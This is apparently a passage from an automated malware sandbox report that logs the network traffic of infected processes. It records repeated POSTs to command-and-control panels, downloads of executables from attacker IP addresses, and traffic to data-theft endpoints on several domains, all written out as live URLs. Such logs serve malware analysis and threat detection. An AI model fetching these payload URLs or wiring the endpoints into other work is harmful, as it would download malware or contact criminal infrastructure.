Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:37:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:38:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:38:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:38:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 26 Mar 2025 20:38:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://176.113.115.7/files/151334531/dBSGwVB.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/151334531/dBSGwVB.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 16:04:50 GMT
ETag: "d0f41f-63140ff3b499f"
Accept-Ranges: bytes
Content-Length: 13693983
Content-Type: application/x-msdos-program
DNS

geo.netsupportsoftware.com

bild.exe

Remote address:

8.8.8.8:53

Request

geo.netsupportsoftware.com

IN A

Response

geo.netsupportsoftware.com

IN A

104.26.1.231

geo.netsupportsoftware.com

IN A

104.26.0.231

geo.netsupportsoftware.com

IN A

172.67.68.212
GET

http://geo.netsupportsoftware.com/location/loca.asp

bild.exe

Remote address:

104.26.1.231:80

Request

GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:43 GMT
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 92697117ab4548c5-LHR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDCABRTTCB=NHIKPHMBBEAEMKMIIPBCBCJE; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CoDE%2BvQew5jWguRQ1daulV2lEPKYuxc6VKNRZFag0J550jFl33e8c5796Os587EPdM8%2F6JTNhPIOhUqwwyZ%2FhpwML7DeZXAknSGQWrxPRwR%2BIcZJmcoA3t08JSRfsiHhmWBBQkSwaYkB0VAr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
server-timing: cfL4;desc="?proto=TCP&rtt=43015&min_rtt=43015&rtt_var=21507&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://176.113.115.7/files/887739535/kDveTWY.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/887739535/kDveTWY.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 17:24:13 GMT
ETag: "16b800-631421b251015"
Accept-Ranges: bytes
Content-Length: 1488896
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/6629342726/oalJJxv.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/6629342726/oalJJxv.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 19:46:15 GMT
ETag: "9c9800-63144171885f5"
Accept-Ranges: bytes
Content-Length: 10262528
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/2043702969/kZZeUXM.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/2043702969/kZZeUXM.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 20:21:57 GMT
ETag: "667c00-6314496cd062c"
Accept-Ranges: bytes
Content-Length: 6716416
Content-Type: application/x-msdos-program
DNS

ferromny.digital

MSBuild.exe

Remote address:

8.8.8.8:53

Request

ferromny.digital

IN A

Response

ferromny.digital

IN A

104.21.64.1

ferromny.digital

IN A

104.21.16.1

ferromny.digital

IN A

104.21.112.1

ferromny.digital

IN A

104.21.32.1

ferromny.digital

IN A

104.21.96.1

ferromny.digital

IN A

104.21.80.1

ferromny.digital

IN A

104.21.48.1
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 41
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IngJPQhMrMM9M9XONkYLu2oNy%2F2baJv7eOzWOFfBAOhaAtW%2BSDFEiQbfPhKRZD2%2FxgJeSEpXMqIMz6wFozuzHLJg4IUZXVkR0s%2FG5G0BSUuenrnoZP0Nmzs8HWDoANX%2BSA9P"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 92697139fc53be9b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49441&min_rtt=44110&rtt_var=15000&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=640&delivery_rate=84858&cwnd=241&unsent_bytes=0&cid=65c1b19ff547ebba&ts=256&x=0"
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=v0l8Gddzx66O6zh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1580
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B79Ysd1TWJ1eHHm7ov5fNRNjWdCNyWgBBXYzgUBh%2BFAXVJdFFa9%2FxXP9p%2FGNXgKt31IvyOrXWnaYXGRKfcGQzFlsA29AG3Gr2ngqOVhBv1Kneglwfm9fhG3%2BcrEeGux0%2FfoU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9269713c3e72be9b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48549&min_rtt=42205&rtt_var=13036&sent=9&recv=11&lost=0&retrans=0&sent_bytes=4245&recv_bytes=2557&delivery_rate=84858&cwnd=243&unsent_bytes=0&cid=65c1b19ff547ebba&ts=581&x=0"
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Y96G7InrIGE3rb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1053
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 9269713e58e9ef40-LHR
alt-svc: h3=":443"; ma=86400
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 79
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:36:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T81pqjqq13c2ji3msnwAwMhHLCG21eCOEKaCGFp2RfjTq8cNvma%2Bodaq7DYwEON6YS1fK5lSak316Yin5EEyKfkUqdVOhXmbtE5ugK7TrbKvuP9qKIQdOb7a6Y8e1Eqvbt1k"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926971434f00ed0c-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56317&min_rtt=44431&rtt_var=25151&sent=9&recv=9&lost=0&retrans=3&sent_bytes=6336&recv_bytes=678&delivery_rate=30541&cwnd=252&unsent_bytes=0&cid=d9d6c791c6856b3d&ts=680&x=0"
DNS

gogo.fechrise.fun

kZZeUXM.exe

Remote address:

8.8.8.8:53

Request

gogo.fechrise.fun

IN A

Response

gogo.fechrise.fun

IN A

2.59.41.142
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 41
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 92697296295abeb2-LHR
alt-svc: h3=":443"; ma=86400
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Q10GC4l7nzj30O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1579
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Ms8dxKCtcd1DadBxGw6pFombyjaMspZ6K8tNR1QHbiByA9%2FMjR0%2BoyAgdjaODT3KjAks0VlPeG8ZmL8hq9eMuNpVH9usNgVSl0qm4y918ZKR8aak%2BI%2BE4YPAkq0p3fKm28U"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926972986b40beb2-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=45719&min_rtt=43699&rtt_var=8300&sent=9&recv=11&lost=0&retrans=0&sent_bytes=3705&recv_bytes=2555&delivery_rate=84394&cwnd=245&unsent_bytes=0&cid=e931acf3a67622fd&ts=564&x=0"
DNS

c.pki.goog

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.180.3
GET

http://c.pki.goog/r/r1.crl

Remote address:

142.250.180.3:80

Request

GET /r/r1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 304 Not Modified

Date: Wed, 26 Mar 2025 19:54:56 GMT
Expires: Wed, 26 Mar 2025 20:44:56 GMT
Age: 2568
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=W92O5rWn325p0U49CEv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1078
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=keUoZICpUVXZEhHZLapE2Dp9qTl8PYg28%2BJ3GFiaOR9UbeYpp%2FHgCr3tXPb0RJh1McgXVS0f7Ov5gp2gWDfi4Rh1ddejI6kcERP9RViwRaFgruj%2F268bWnfyuUAGLEhKDgge"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9269729a8ffa9469-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=45859&min_rtt=45541&rtt_var=10130&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3298&recv_bytes=1695&delivery_rate=86145&cwnd=253&unsent_bytes=0&cid=eb1ba5a1c69e7eee&ts=281&x=0"
POST

https://ferromny.digital/gwpd

MSBuild.exe

Remote address:

104.21.64.1:443

Request

POST /gwpd HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 79
Host: ferromny.digital

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAiK8XeZLDc7HD%2B%2BmuHt2XhTTObfCJUCGL9AKtzHA82pp5%2F8TWGnPssRLN9inf9skiiqLmS1QgQc2fY2n4AJV7Dj8f0WuNqphgwIkBajca4C9dTRrVufHL054EhnTSUiCsrX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9269729ceb3948bf-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47915&min_rtt=42673&rtt_var=12760&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=678&delivery_rate=92830&cwnd=253&unsent_bytes=0&cid=333b5ee3fc50052b&ts=232&x=0"
GET

http://176.113.115.7/files/fate/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/fate/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 25 Mar 2025 18:10:04 GMT
ETag: "119c00-6312ea1425700"
Accept-Ranges: bytes
Content-Length: 1154048
Content-Type: application/x-msdos-program
DNS

t.me

MSBuild.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/cosmicsex

MSBuild.exe

Remote address:

149.154.167.99:443

Request

GET /cosmicsex HTTP/1.1
Connection: Keep-Alive
Host: t.me

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 26 Mar 2025 20:37:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12346
Connection: keep-alive
Set-Cookie: stel_ssid=576bc31b9925d3777d_7534708451025703749; expires=Thu, 27 Mar 2025 20:37:49 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

cosmosyf.top

MSBuild.exe

Remote address:

8.8.8.8:53

Request

cosmosyf.top

IN A

Response

cosmosyf.top

IN A

104.21.112.1

cosmosyf.top

IN A

104.21.48.1

cosmosyf.top

IN A

104.21.64.1

cosmosyf.top

IN A

104.21.32.1

cosmosyf.top

IN A

104.21.80.1

cosmosyf.top

IN A

104.21.96.1

cosmosyf.top

IN A

104.21.16.1
POST

https://cosmosyf.top/GOsznj

MSBuild.exe

Remote address:

104.21.112.1:443

Request

POST /GOsznj HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 51
Host: cosmosyf.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRgwPN1E2vrYGx5vqB%2FMXLlZTJ5D%2FkYlVQQLkN8iwywmpr%2BQ1W9DAI5LBfSKsXI%2B8CPo7ka00%2Ft%2FycVgF%2BK%2Bi9QXlvKNcB7dQFW9YArNg2mbRzpOolKZ9MddHEEe4Sg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926972baf9c26413-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50079&min_rtt=45634&rtt_var=12307&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3288&recv_bytes=644&delivery_rate=86434&cwnd=253&unsent_bytes=0&cid=17d3d1eb06fa74eb&ts=239&x=0"
POST

https://cosmosyf.top/GOsznj

MSBuild.exe

Remote address:

104.21.112.1:443

Request

POST /GOsznj HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=OpAS3I5d1W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1560
Host: cosmosyf.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WtvZAleQT2E%2F%2BBEXbNteiLh8OxgtvQBQM7mEKpPGpzjWJFlrhBNHUd%2F%2BQOvovCef5pJp%2B9x0LXvfy0dtOoY5777ad8d%2Fhj9uoM3L9mTcg0WYspVuuwkrFISS3gA3diU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926972bd1b8b6413-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49083&min_rtt=42040&rtt_var=11223&sent=9&recv=11&lost=0&retrans=0&sent_bytes=4241&recv_bytes=2534&delivery_rate=86434&cwnd=255&unsent_bytes=0&cid=17d3d1eb06fa74eb&ts=528&x=0"
POST

https://cosmosyf.top/GOsznj

MSBuild.exe

Remote address:

104.21.112.1:443

Request

POST /GOsznj HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=E21EY9x121jEpOE4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1073
Host: cosmosyf.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NG9FcJkrjkdJGGOOfVy%2F2V40M5CCIW%2FV9fii81KYk3OdeEuQxiOvk%2F8J0xqdo65VXy24YOT%2F%2FZQ1M2khJmAwAvqNNPK648GWbjFXccuGFewtC4lBNzl7VGmpEsNHffQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926972c46abff65e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=45612&min_rtt=44695&rtt_var=14348&sent=9&recv=8&lost=0&retrans=1&sent_bytes=3544&recv_bytes=1681&delivery_rate=79458&cwnd=253&unsent_bytes=0&cid=c46344415554a5dc&ts=507&x=0"
POST

https://cosmosyf.top/GOsznj

MSBuild.exe

Remote address:

104.21.112.1:443

Request

POST /GOsznj HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 89
Host: cosmosyf.top

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 926972c6ad5aed0e-LHR
alt-svc: h3=":443"; ma=86400
GET

http://176.113.115.7/files/7033027882/WLbfHbp.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/7033027882/WLbfHbp.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:37:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 15:06:19 GMT
ETag: "16ffc6-631402df68333"
Accept-Ranges: bytes
Content-Length: 1507270
Content-Type: application/x-msdos-program
GET

http://107.174.192.179/app/f73ae_003.exe

rapes.exe

Remote address:

107.174.192.179:80

Request

GET /app/f73ae_003.exe HTTP/1.1
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:02 GMT
Content-Type: application/octet-stream
Content-Length: 1367040
Last-Modified: Wed, 26 Mar 2025 01:56:00 GMT
Connection: keep-alive
ETag: "67e35eb0-14dc00"
Accept-Ranges: bytes
GET

http://107.174.192.179/data/003

Request

GET /data/003 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:05 GMT
Content-Type: application/octet-stream
Content-Length: 1995776
Last-Modified: Wed, 26 Mar 2025 01:54:07 GMT
Connection: keep-alive
ETag: "67e35e3f-1e7400"
Accept-Ranges: bytes
GET

http://107.174.192.179/clean

Request

GET /clean HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:07 GMT
Content-Type: application/octet-stream
Content-Length: 1400832
Last-Modified: Sat, 22 Mar 2025 01:09:32 GMT
Connection: keep-alive
ETag: "67de0dcc-156000"
Accept-Ranges: bytes
DNS

qXKsaAtiXZvyuQpsTxATA.qXKsaAtiXZvyuQpsTxATA

Request

qXKsaAtiXZvyuQpsTxATA.qXKsaAtiXZvyuQpsTxATA

IN A

Response
DNS

grabify.link

Request

grabify.link

IN A

Response

grabify.link

IN A

104.26.8.202

grabify.link

IN A

172.67.68.246

grabify.link

IN A

104.26.9.202
GET

https://grabify.link/ZATFQO

Request

GET /ZATFQO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: grabify.link

Response

HTTP/1.1 403 Forbidden

Date: Wed, 26 Mar 2025 20:38:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6854
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cf-mitigated: challenge
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
server-timing: chlray;desc="926973297edc94a0"
x-content-options: nosniff
